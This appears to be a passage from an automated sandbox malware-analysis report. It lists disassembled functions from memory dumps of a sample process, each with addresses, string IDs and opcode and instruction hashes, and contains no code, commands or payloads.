                                              • Instruction Fuzzy Hash: 1FB09283C1F28116EB4222328C0B6581FA1AEA224171ED0A342558155BEA18854A8A06
                                              Function 0749034F Relevance: .0, Instructions: 6COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4514673446.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_7490000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 22b0f6b022cbc63e95422638e0f47f42afcb3c444b0bbe9de5bde40beaf47cd4
                                              • Instruction ID: 79295edd70c7a308a25c8aa01b14ad64f90c2aa7830af9489360cb8633f15d40
                                              • Opcode Fuzzy Hash: 22b0f6b022cbc63e95422638e0f47f42afcb3c444b0bbe9de5bde40beaf47cd4
                                              • Instruction Fuzzy Hash: 06C048B04016008ACF18AF28A1482903AA0AB98329B30428DD0288A2D2C376CA83DAD2

                                              Non-executed Functions

                                              Function 06DB77B8 Relevance: 13.0, Strings: 10, Instructions: 468COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4513106351.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6db0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                              • API String ID: 0-2843079600
                                              • Opcode ID: 1fc54fb9074a4693a3bb8ca0032c8f8e7d410bacbdf5abaa978cf66d4a20c898
                                              • Instruction ID: fea57ce30df1ad08aeaca025886cf63a3cdfc5473496b023b070576a53bc073c
                                              • Opcode Fuzzy Hash: 1fc54fb9074a4693a3bb8ca0032c8f8e7d410bacbdf5abaa978cf66d4a20c898
                                              • Instruction Fuzzy Hash: DC123C30E00219CFDB68DF69D994A9DB7B2FFC8304F209969D40AAB258DB349D41CF90
                                              Function 06DBAA50 Relevance: 10.2, Strings: 8, Instructions: 229COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4513106351.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6db0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                              • API String ID: 0-1273862796
                                              • Opcode ID: 9ce5847375b2e7894a7dc300d80faeecd52b5bd914113d1a3c0fc74193606d60
                                              • Instruction ID: bb4ea79ad770dd87dba0a57047ba0970d86880bebb628155c81ea0ed49492881
                                              • Opcode Fuzzy Hash: 9ce5847375b2e7894a7dc300d80faeecd52b5bd914113d1a3c0fc74193606d60
                                              • Instruction Fuzzy Hash: 9B919234A00209DFDB68DF69D594BAE77F6FF84304F189529E842A7298DB38DC45CB90
                                              Function 06DB71B8 Relevance: 9.2, Strings: 7, Instructions: 405COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4513106351.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6db0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: .5uq$$]q$$]q$$]q$$]q$$]q$$]q
                                              • API String ID: 0-981061697
                                              • Opcode ID: 9bbe58de30192ba85e411eea81e4d954de0a0412169a00f7cf8c47eda6288d35
                                              • Instruction ID: 3ce3738892fb8cb04604a8bcd12a505dd216804f4a37d22405104873d77d97ad
                                              • Opcode Fuzzy Hash: 9bbe58de30192ba85e411eea81e4d954de0a0412169a00f7cf8c47eda6288d35
                                              • Instruction Fuzzy Hash: 29F11B34B00209CFDB59DF68D554AAEB7B6FFC4704F248568D406AB3A8DB799C42CB81
                                              Function 06DBBB30 Relevance: 7.7, Strings: 6, Instructions: 197COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4513106351.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6db0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $]q$$]q$$]q$$]q$$]q$$]q
                                              • API String ID: 0-3723351465
                                              • Opcode ID: 72a8fc31b9234b8593d62006ea0adb048514c65e171d0241ede69be59e041e87
                                              • Instruction ID: 71f02976deb2c3fa24d91e9f8690657991e844d72abadadeca4dd26f6246fdf3
                                              • Opcode Fuzzy Hash: 72a8fc31b9234b8593d62006ea0adb048514c65e171d0241ede69be59e041e87
                                              • Instruction Fuzzy Hash: A9719C30A00219CFDB68CF69E9506AEB7F6FF84304B10952AD4479B258DF79ED46CB81
                                              Function 06DB84F0 Relevance: 5.3, Strings: 4, Instructions: 282COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4513106351.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6db0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $]q$$]q$$]q$$]q
                                              • API String ID: 0-858218434
                                              • Opcode ID: d0533016afa0c30cd639ae6a737b8a9aaa9abefa8d5cae296b74b4716e497a31
                                              • Instruction ID: 12ee4a86d5a7a26fe688c384befa4b7c7c4a74051710804ae3814c974ca152b9
                                              • Opcode Fuzzy Hash: d0533016afa0c30cd639ae6a737b8a9aaa9abefa8d5cae296b74b4716e497a31
                                              • Instruction Fuzzy Hash: 89B10934E00209CFDB58DFA9D5906AEB7B6FF84704F249929D406AB358DB75DC86CB80
                                              Function 06DB8908 Relevance: 5.2, Strings: 4, Instructions: 168COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4513106351.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6db0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: LR]q$LR]q$$]q$$]q
                                              • API String ID: 0-3527005858
                                              • Opcode ID: 3133b935259a274542deafd60eee47f7d0ea0a67e25588149061182214a02897
                                              • Instruction ID: b021d6d4211dcd2e736c135414fd58f84d07bb089da3e27a01196c3be0917a8b
                                              • Opcode Fuzzy Hash: 3133b935259a274542deafd60eee47f7d0ea0a67e25588149061182214a02897
                                              • Instruction Fuzzy Hash: E6518130B00205DFDF58DF28D940AAAB7FAFF85704B149568E4079B3A9DA38EC41CB91
                                              Function 06DBADD8 Relevance: 5.2, Strings: 4, Instructions: 159COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4513106351.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6db0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $]q$$]q$$]q$$]q
                                              • API String ID: 0-858218434
                                              • Opcode ID: 5f65bdb2f8c5b485c56d2e91255dddc347892108faa48160da650bef895b8623
                                              • Instruction ID: 2e8f00680634578a13f13024c46cbba086fae6dcef5fbb83fa82989192a043ed
                                              • Opcode Fuzzy Hash: 5f65bdb2f8c5b485c56d2e91255dddc347892108faa48160da650bef895b8623
                                              • Instruction Fuzzy Hash: 99517D34F10205CFDBA9DF68D5806EDB7B2EB89314F18952AE416EB258DB35DC42CB90